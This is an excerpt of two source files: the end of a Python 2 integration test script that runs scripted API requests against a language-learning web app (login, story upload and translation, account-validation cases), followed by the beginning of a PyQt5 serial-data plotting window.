urls.append(dict(loc = "/api?human=0&alien=" + who + "&connect=1&finish=1&state=" + state + "&code=" + oauth["codes"][who], method = "get", data = {}, success = True, test_success = True, retry_action = "logout"))
parameters["oauth"][who]["token_url"] = "http://localhost:" + str(server_port) + "/" + who
parameters["oauth"][who]["lookup_url"] = "http://localhost:" + str(server_port) + "/" + who
urls.append(common_urls["logout"])
break
common_urls = {
"storylist" : [
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000", "method" : "get", "success" : True, "test_success" : True },
],
"storylist_rotate" : [
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000&force_rotate=1", "method" : "get", "success" : True, "test_success" : True },
],
"storylist_triple" : [
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=storylist&tzoffset=18000", "method" : "get", "success" : True, "test_success" : True },
],
"logout" : [
{ "loc" : "/api?human=0&alien=disconnect", "method" : "get", "success" : True, "test_success" : True },
],
"login" : [
{ "loc" : "/connect", "method" : "post", "success" : True, "test_success" : True, "data" : dict(human='0', username=test["username"], password=test["password"], remember='on', address=parameters["couch_proto"] + "://" + parameters["couch_server"] + ":" + str(parameters["couch_port"]), connect='1') },
],
"relogin" : [
{ "loc" : "/api?human=0&alien=disconnect", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/connect", "method" : "post", "success" : True, "test_success" : True, "data" : dict(human='0', username=test["username"], password=test["password"], remember='on', address=parameters["couch_proto"] + "://" + parameters["couch_server"] + ":" + str(parameters["couch_port"]), connect='1') },
],
"account" : [
{ "loc" : "/api?human=0&alien=account", "method" : "get", "success" : True, "test_success" : True },
],
}
def init_and_translate(storyname) :
return [
# Need to retrieve the UUID again for the story initialization.
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + storyname, "method" : "get", "success" : None, "test_success" : None, "couch" : True},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", storyinit = 1, name = storyname), "check_job_running" : False},
] + common_urls["storylist_triple"] + [
# This get is only to retrieve the UUID again for the story initialization.
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + storyname, "method" : "get", "success" : None, "test_success" : None, "couch" : True},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", translate = 1, name = storyname), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "read", tstatus = 1), "check_job_running" : False, "until" : { "path" : ["translated", "translating"], "equals" : "no"}},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "read", tstatus = 1), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", reviewed = 1), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", reviewed = 0), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", reviewed = 1), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", finished = 1), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", finished = 0), "check_job_running" : False},
{ "loc" : "/api", "method" : "get", "success" : True, "test_success" : True, "data" : dict(human = 0, alien = "home", finished = 1), "check_job_running" : False},
] + common_urls["storylist_triple"]
def file_story(filename, languagetype, filetype, mimetype) :
return [
{ "loc" : "/api?human=0&alien=home", "method" : "post", "success" : True, "test_success" : True, "data" : dict(filetype = filetype, filename = filename, languagetype = languagetype, uploadfile = "1") },
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + filename, "method" : "get", "success" : None, "test_success" : None, "couch" : True},
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + filename + "/" + filename, "method" : "put", "success" : None, "test_success" : None, "upload" : filename, "upload_type" : mimetype, "forward_keys" : ["_rev/rev"], "data" : {}, "couch" : True},
] + common_urls["storylist_triple"]
def txt_story(storyname, languagetype, source) :
return [
{ "loc" : "/api?human=0&alien=home", "method" : "post", "success" : True, "test_success" : True, "data" : dict(storyname = storyname, languagetype = languagetype, uploadtext = "1") },
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + storyname, "method" : "get", "success" : None, "test_success" : None , "couch" : True},
{ "loc" : "/mica/MICA:family@hinespot.com:stories:" + storyname + "?authorization=false", "method" : "put", "success" : None, "test_success" : None, "data" : {"_id" : "MICA:family@hinespot.com:stories:" + storyname, "format" : 2, "filetype" : "txt", "source_language" : languagetype.split(",")[1], "reviewed": False, "date" : 1449946344.440684, "nb_pages" : 0, "name" : storyname, "translated": False, "new" : True, "target_language" : languagetype.split(",")[0], "txtsource" : "从前有个小孩,爸爸死了,妈妈病了,日子可不好过了。"}, "forward_keys" : ["_rev"], "couch" : True},
] + common_urls["storylist_triple"]
try :
tests = [
common_urls["logout"],
{ "loc" : "/connect", "method" : "post", "success" : False, "test_success" : False, "data" : dict(human='0', username=test["username"], password="wrongpassword", remember='on', address=couch, connect='1') },
common_urls["login"],
common_urls["storylist"],
common_urls["storylist_rotate"],
{ "repeat" : 80, "urls" : [
{ "loc" : "/api?human=0&alien=read&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&memolist=1&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&memorized=1&nb_unit=8&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&memorized=0&nb_unit=3&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0&image=0", "method" : "get", "success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&memolist=1&page=0", "method" : "get", "success" : True },
{ "loc" : "/api?human=0&alien=instant&source=%E7%82%8E%E7%83%AD&lang=en&source_language=zh-CHS&target_language=en", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&switchmode=text", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&reviewlist=1&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&multiple_select=1&index=1&nb_unit=12&trans_id=10&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&multiple_select=1&index=1&nb_unit=48&trans_id=42&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home", "method" : "post", "success" : True, "test_success" : True, "data" : dict(retranslate = '1', page = '0', uuid = 'b220074e-f1a7-417b-9f83-e63cebea02cb') },
# Assert that the default has changed and move multiple_select to actual JSON, then retry the request
{ "loc" : "/api?human=0&alien=edit&view=1", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=edit&view=1&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&page=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=edit&uuid=b220074e-f1a7-417b-9f83-e63cebea02cb&editslist=1&page=0", "method" : "get", "success" : True, "test_success" : True },
]
},
{ "loc" : "/api?human=0&alien=edit", "method" : "post", "success" : True, "test_success" : True, "data" : dict(oprequest = '[{"operation":"split","uuid":"b220074e-f1a7-417b-9f83-e63cebea02cb","units":1,"failed":false,"chars":"小鸟","pinyin":"xiǎo+niǎo","nbunit":"8","uhash":"0b23c772194ef5a97aa23d5590105665","index":"-1","pagenum":"0","out":""},{"operation":"merge","uuid":"b220074e-f1a7-417b-9f83-e63cebea02cb","units":2,"failed":false,"chars":"跳","pinyin":"tiào","nbunit0":"45","uhash0":"0cdbc17e9ed386e3f3df2b26ed5b5187","index0":"-1","page0":"0","chars0":"跳","pinyin0":"tiào","nbunit1":"46","uhash1":"0cdbc17e9ed386e3f3df2b26ed5b5187","index1":"-1","page1":"0","chars1":"跳","pinyin1":"tiào","out":""}]', uuid = "b220074e-f1a7-417b-9f83-e63cebea02cb") },
{ "loc" : "/api?human=0&alien=edit", "method" : "post", "success" : True, "test_success" : True, "data" : dict(oprequest = '[{"operation":"split","uuid":"b220074e-f1a7-417b-9f83-e63cebea02cb","units":1,"failed":false,"chars":"山羊","pinyin":"shān+yáng","nbunit":"111","uhash":"fb7335cbba25395d3b9a867ddad630fd","index":"-1","pagenum":"0","out":""}]', uuid = "b220074e-f1a7-417b-9f83-e63cebea02cb") },
# Bulk review: not tested
#{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=128", "method" : "get", "success" : True, "test_success" : True },
#{ "loc" : "/api?human=0&alien=home", "method" : "post", "success" : True, "test_success" : True, "data" : dict(transid0 = 67, index0 = 1, nbunit0 = 75, page0 = 151, transid1 = 74, index1 = 1, nbunit1 = 84, page1 = 151, transid2 = 81, index2 = 1, nbunit2 = 93, page2 = 151, transid3 = 88, index3 = 1, nbunit3 = 102, page3 = 151, transid4 = 105, index4 = 1, nbunit4 = 123, page4 = 151, count = 5, bulkreview = 1) },
#{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "repeat" : 80, "urls" : [
# Switch to split view on sample
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&switchmode=both", "method" : "get", "success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=151&image=0", "method" : "get", "success" : True, "test_success" : True },
# Switch to image-only
{ "loc" : "/api?human=0&alien=home&switchmode=images", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=151&image=0", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
# Switch back to text-only
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=151", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=home&switchmode=badviewmode", "method" : "get", "success" : False, "test_success" : False },
{ "loc" : "/api?human=0&alien=home&switchmode=text", "method" : "get", "success" : True, "test_success" : True },
# Go to page 35
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=34", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=34", "method" : "get", "success" : True, "test_success" : True },
# Go to last page
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=239", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&reviewlist=1&page=239", "method" : "get", "success" : True, "test_success" : True },
# Go one page past the end
# Javascript won't let us do this, but I might screw up
# Will cause a replication error, requiring us to re-login
{ "loc" : "/api?human=0&alien=home&view=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&page=240", "method" : "get", "success" : False, "test_success" : False },
common_urls["login"],
# Go one page before the beginning.
{ "loc" : "/api?human=0&alien=read&meaningmode=true", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=read&meaningmode=false", "method" : "get", "success" : True, "test_success" : True },
# Muck with account
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=1, tofrom='zh-CHS,en') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=0, tofrom='zh-CHS,en') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=1, tofrom='es,en') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=0, tofrom='es,en') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=1, tofrom='en,es') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=0, tofrom='en,es') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=1, tofrom='en,zh-CHS') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(remove=0, tofrom='en,zh-CHS') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(remove=0, tofrom='nosuchdictionary') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = "whoops2@whoops.com", username = "whoops2@whoops.com", password = "short", confirm = "short", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = "whoops2@whoops.com", username = "whoops2@whoops.com", password = "verylongpass", confirm = "notsame", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = "whoops2@whoops.com", username = "whoops2@whoops.com", password = "verylongpass", confirm = "notsame", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = "whoop2@whoops.com", username = "bad:username", password = "verylongpass", confirm = "verylongpass", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(email = "whoops2@whoops.com", username = "whoops2@whoops.com", password = "verylongpass", confirm = "verylongpass", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account&deleteaccount=1&username=nosuchaccount", "method" : "get", "success" : False, "test_success" : True },
{ "loc" : "/api?human=0&alien=account&deleteaccount=1&username=whoops2@whoops.com", "method" : "get", "success" : True, "test_success" : True },
]
# end of repeated section
},
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(email = "whoops3@whoops.com", username = "whoops3@whoops.com", password = "verylongpass", confirm = "verylongpass", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(email = "whoops3@whoops.com", username = "whoops3@whoops.com", password = "verylongpass", confirm = "verylongpass", newaccount = "password") },
{ "loc" : "/api?human=0&alien=account&pack=1", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=account", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(oldpassword = test["password"], password = "short", confirm = "short", changepassword = "1") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(oldpassword = test["password"], password = "notthesame", confirm = "foobarbaz", changepassword = "1") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(oldpassword = "wrongoldpassword", password = "foobarbaz", confirm = "foobarbaz", changepassword = "1") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(oldpassword = test["password"], password = "foobarbaz", confirm = "foobarbaz", changepassword = "1") },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(oldpassword = "foobarbaz", password = test["password"], confirm = test["password"], changepassword = "1") },
{ "loc" : "/api?human=0&alien=account&resetpassword=1", "method" : "get", "success" : True, "test_success" : True },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(password = test["password"], confirm = test["password"], changepassword = "1"), "forward_keys" : ["oldpassword"] },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(language = 'badlanguage', changelanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(language = 'en', changelanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(learnlanguage = 'badlanguage', changelearnlanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(learnlanguage = 'py', changelearnlanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(learnlanguage = 'zh', changelearnlanguage = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = 'waaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaytoolong@email.com', changeemail = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = 'email withspace@email.com', changeemail = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(email = 'emailwithoutatsymbol', changeemail = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(email = 'normal@email.com', changeemail = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setappchars = '1001') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setappchars = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(setappchars = 'notanumber') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(setappchars = '70') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setwebchars = '1001') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setwebchars = '1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(setwebchars = 'notanumber') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(setwebchars = '70') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setwebzoom = '3.1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setwebzoom = '0.4') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(setwebzoom = 'notanumber') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(setwebzoom = '1.0') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setappzoom = '3.1') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : False, "data" : dict(setappzoom = '0.4') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : False, "test_success" : False, "data" : dict(setappzoom = 'notanumber') },
{ "loc" : "/api?human=0&alien=account", "method" : "post", "success" : True, "test_success" : True, "data" : dict(setappzoom = '1.0') },
common_urls["account"],
{ "repeat" : 10, "urls" : [
{ "sleep" : test_timeout * 2, "loc" : "sleep", "method" : "none" },
common_urls["login"],
]
},
txt_story("chinese_test", "zh-CHS,en", "从前有个小孩,爸爸死了,妈妈病了,日子可不好过了。"),
init_and_translate("chinese_test"),
txt_story("english_test", "en,zh-CHS", "this is a test"),
init_and_translate("english_test"),
file_story("asample1.pdf", "zh-CHS,en", "pdf", "application/pdf"),
init_and_translate("asample1.pdf"),
file_story("family.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("family.txt"),
file_story("asample2.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("asample2.txt"),
file_story("bao.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("bao.txt"),
file_story("book1234.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("book1234.txt"),
file_story("little_bear.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("little_bear.txt"),
file_story("little_bird.txt", "zh-CHS,en", "txt", "text/plain"),
init_and_translate("little_bird.txt"),
# Tests that cause purges and long map reduces.
{ "loc" : "/api?human=0&alien=home&forget=1&uuid=5989087e-6896-4653-b91e-d6422d6b369a", "method" : "get", "success" : True, "test_success" : True, "check_job_running" : False },
common_urls["storylist_triple"],
{ "loc" : "/api?human=0&alien=home&delete=1&uuid=5989087e-6896-4653-b91e-d6422d6b369a&name=bao_gong_interrogates_a_rock.txt", "method" : "get", "success" : True, "test_success" : True, "check_job_running" : False },
common_urls["storylist_triple"],
common_urls["relogin"],
{ "repeat" : 2, "urls" : [
{ "sleep" : test_timeout * 2, "loc" : "sleep", "method" : "none" },
common_urls["login"],
]
},
# Long-running, but excellent test to delete a large story:
{ "loc" : "/api?human=0&alien=home&forget=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9", "method" : "get", "success" : True, "test_success" : True, "check_job_running" : False },
common_urls["storylist_triple"],
{ "loc" : "/api?human=0&alien=home&delete=1&uuid=37d4bcbb-752f-4a83-8ded-336554d503b9&name=301_book1.pdf", "method" : "get", "success" : True, "test_success" : True, "check_job_running" : False },
common_urls["storylist_triple"],
common_urls["relogin"],
{ "repeat" : 2, "urls" : [
{ "sleep" : test_timeout * 2, "loc" : "sleep", "method" : "none" },
common_urls["login"],
]
},
# TODO:
# Test bulk edits
# Test parallel requests of everything
# Audit usage of "success"
# Test quotas
# { "stop" : True },
]
except Exception, e :
tlog(str(e))
def add_chat_tests() :
chatfname = cwd + 'chats.txt'
chatfd = open(chatfname, 'r')
tlog("Reading in chat tests...")
#urls.append(common_urls["relogin"])
while True :
line = chatfd.readline().strip()
if not line :
break
if line == "storylist" :
urls.append(common_urls["storylist_rotate"])
elif line.count("source=") :
urls.append({"loc" : "/api?" + line, "method" : "get", "success" : None, "test_success" : True})
else :
urls.append({"loc" : "/api?" + line, "method" : "get", "success" : True, "test_success" : True})
chatfd.close()
urls.append(common_urls["storylist_rotate"])
#urls.append(common_urls["logout"])
#urls.append({ "stop" : True })
try :
urls += tests
for x in range(0, 100) :
add_oauth_tests()
add_chat_tests()
sleep(5)
urls.append(common_urls["logout"])
urls.append({ "stop" : True })
except Exception, e :
for line in format_exc().splitlines() :
tlog(line)
old_timeout = int(change_timeout(test_timeout)[1:-2])
stop = True
good = True
try :
stop = run_tests(urls)
except AssertionError, e :
tlog(str(e))
good = False
except Exception, e :
for line in format_exc().splitlines() :
tlog(line)
#pass
change_timeout(604800)
#change_timeout(old_timeout)
record.close()
httpd.socket.close()
if not stop :
try:
secs = int(time()) - start_time
tlog("Done in " + str(secs) + " secs. Application left running...")
while True :
sleep(10)
except KeyboardInterrupt:
tlog("CTRL-C interrupt")
exit(0 if good else 1)
|
plotter_window.py
|
import re
import sys
from threading import Thread
import matplotlib as mpl
import numpy as np
import serial
from PyQt5 import QtGui
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QFileDialog, QTextEdit, \
QComboBox, QMainWindow, QGridLayout, QLabel
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT
from matplotlib.figure import Figure
from pathlib import Path
import pandas as pd
mpl.use('Qt5Agg')
class Canvas(FigureCanvasQTAgg):
def __init__(self, parent=None, width=5, height=8, dpi=100):
fig = Figure(figsize=(width, height), dpi=dpi)
self.axes = fig.add_subplot(111)
super(Canvas, self).__init__(fig)
class Window(QMainWindow):
def __init__(self):
super().__init__()
self.layout = QGridLayout(self)
self.main_widget = QWidget(self)
self.textbox = QTextEdit(self)
self.cursor = self.textbox.textCursor()
self.comboBoxCOM = QComboBox(self)
self.comboBoxBaud = QComboBox(self)
self.comboBoxBit = QComboBox(self)
self.comboBoxStopBits = QComboBox(self)
self.comboBoxParity = QComboBox(self)
self.comboBoxSensor = QComboBox(self)
self.main_plot = Canvas(self, width=5, height=7, dpi=100)
self.toolbar = NavigationToolbar2QT(self.main_plot, self)
self.timebase = 50 # ms
self.n_data = 100
self.x_data_plot = list(range(self.n_data))
self.plot_yrange = {"acc": [-2200, 2200], "gyr": [-1500000, 1500000], "enc": [-50, 50]}
self.x_data = np.array([])
self.y_data = [[np.array([]) for _ in range(3)] for _ in range(3)] # accel, gyro, enc
self._plot_refs = [None, None, None]
self._stop_flag = False
self._reading_thread = None
self.plot_colours = ("r", "g", "b")
self._title = "DATA PLOTTER"
self._positions = (200, 100, 1200, 900) # right, down, width, height
self.com_port = "COM3"
self.baud_rate = "115200"
self.data_bits = "8"
self.parity = "NONE"
self.stop_bits = "1"
self.sensor = "ACCELEROMETER"
self.init_main_widget()
self.setCentralWidget(self.main_widget)
self.init_basic_elements()
def init_main_widget(self):
self.textbox.setReadOnly(True)
for widget in (self.main_plot, self.toolbar, self.textbox):
self.layout.addWidget(widget)
self.main_widget.setLayout(self.layout)
def init_basic_elements(self):
self.setWindowTitle(self._title)
self.setGeometry(*self._positions)
self.setFixedSize(*self._positions[2:])
buttons = {"OPEN": {"pos": (10, 10, 100, 22), "func": self.start_reading},
"CLOSE": {"pos": (110, 10, 100, 22), "func": self.stop_reading},
"SAVE": {"pos": (250, 10, 100, 22), "func": self.save_data},
"CLEAR": {"pos": (350, 10, 100, 22), "func": self.clear_window}}
for btn_name, btn_params in buttons.items():
btn = QPushButton(btn_name, self)
btn.setGeometry(*btn_params["pos"])
btn.clicked.connect(btn_params["func"])
bits = [str(i) for i in range(8, 4, -1)]
stop_bits = [str(i) for i in range(1, 3)]
ports = [f"COM{i}" for i in range(1, 11)]
sensors = ["ACCELEROMETER", "GYROSCOPE", "ENCODERS"]
parity = ('NONE', 'ODD', 'EVEN', 'MARK', 'SPACE')
baud_rates = ("115200", "57600", "38400", "19200", "9600", "1200", "300", "921600", "460800",
"230400", "4800", "2400", "150", "110")
combo_boxes = {self.comboBoxCOM: {"items": ports, "func": self.combo_com_change, "pos": (500, 10),
"def": ports.index(self.com_port), "label": "Port"},
self.comboBoxBaud: {"items": baud_rates, "func": self.combo_bit_change, "pos": (610, 10),
"def": baud_rates.index(self.baud_rate), "label": "Baud"},
self.comboBoxBit: {"items": bits, "func": self.combo_bit_change, "pos": (720, 10),
"def": bits.index(self.data_bits), "label": "Data bits"},
self.comboBoxParity: {"items": parity, "func": self.combo_parity_change, "pos": (830, 10),
"def": parity.index(self.parity), "label": "Parity"},
self.comboBoxStopBits: {"items": stop_bits, "func": self.combo_stopbits_change, "pos": (940, 10),
"def": stop_bits.index(self.stop_bits), "label": "Stop bits"},
self.comboBoxSensor: {"items": sensors, "func": self.combo_sensor_change, "pos": (1050, 10),
"def": sensors.index(self.sensor), "label": "Sensors"}}
for combo_box, combo_params in combo_boxes.items():
for item in combo_params["items"]:
combo_box.addItem(item)
combo_box.move(*combo_params["pos"])
combo_box.setCurrentIndex(combo_params["def"])
combo_box.currentIndexChanged.connect(combo_params["func"])
combo_label = QLabel(self)
combo_label.setText(combo_params["label"])
combo_label.move(combo_params["pos"][0], 35)
self.show()
def combo_com_change(self):
self.com_port = self.comboBoxCOM.currentText()
def combo_bit_change(self):
self.data_bits = self.comboBoxBit.currentText()
def combo_parity_change(self):
self.parity = self.comboBoxParity.currentText()
def combo_baud_change(self):
self.baud_rate = self.comboBoxBaud.currentText()
